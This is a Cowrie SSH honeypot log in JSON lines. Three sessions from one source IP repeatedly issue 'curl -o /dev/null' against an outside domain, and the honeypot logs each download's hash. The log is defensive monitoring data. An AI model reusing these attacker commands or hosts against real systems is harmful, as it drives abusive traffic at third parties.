{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.060618Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.061797Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.062431Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.064268Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.064874Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.066272Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.066821Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.099767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.103550Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.105395Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.107198Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.108081Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.113882Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.114736Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.116186Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.116870Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.148883Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.152216Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.154110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.155478Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.155957Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.158131Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.158598Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.164997Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.166759Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.195190Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.196221Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.196719Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.198774Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.199220Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.202863Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.205229Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.207269Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.207839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.236359Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.238194Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.240268Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.241603Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.242261Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.245000Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.245722Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.249685Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.250349Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.258483Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.281833Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.282515Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.284387Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.285364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.287589Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.288269Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.290524Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.292799Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.319630Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.320320Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.324637Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.325393Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.328067Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.330125Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.332836Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.333992Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.334707Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.362248Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.362802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.395252Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.427553Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.430136Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.430894Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.432742Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.433397Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.440023Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.443046Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.476880Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.477680Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.479769Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.480748Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.484706Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.488231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.490897Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.511602Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:31.516498Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:31.517133Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
